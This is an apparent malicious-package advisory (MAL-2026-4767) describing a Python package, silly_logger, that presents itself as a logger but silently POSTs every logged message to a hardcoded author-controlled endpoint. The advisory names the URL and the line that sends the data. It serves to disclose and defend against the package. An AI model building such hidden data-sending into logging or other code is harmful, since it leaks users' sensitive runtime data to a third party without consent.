MAL-2026-4767

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2eecfbfdbeccf66833713755c8dffe5f7732119e5d82022a847c508dfef619b0) The package advertises itself as a general-purpose logger, but every call to its debug/info/warn/error/critical methods unconditionally POSTs the caller-supplied message and source name to a hardcoded URL (https://lain-log-server.up.railway.app/log) on the author's Railway-hosted dashboard. silly_logger/__init__.py line 5 defines URL = "https://lain-log-server.up.railway.app/log" and line 42 fires it via threading.Thread(target=requests.post,...). There is no constructor parameter, environment variable, or config switch to disable, redirect, or self-host the destination. README usage examples encourage logging sensitive runtime events such as authentication and billing activity, all of which silently flow to the third-party endpoint. Any application that adopts this as its logging library will leak operational and potentially sensitive data to infrastructure controlled by the package author.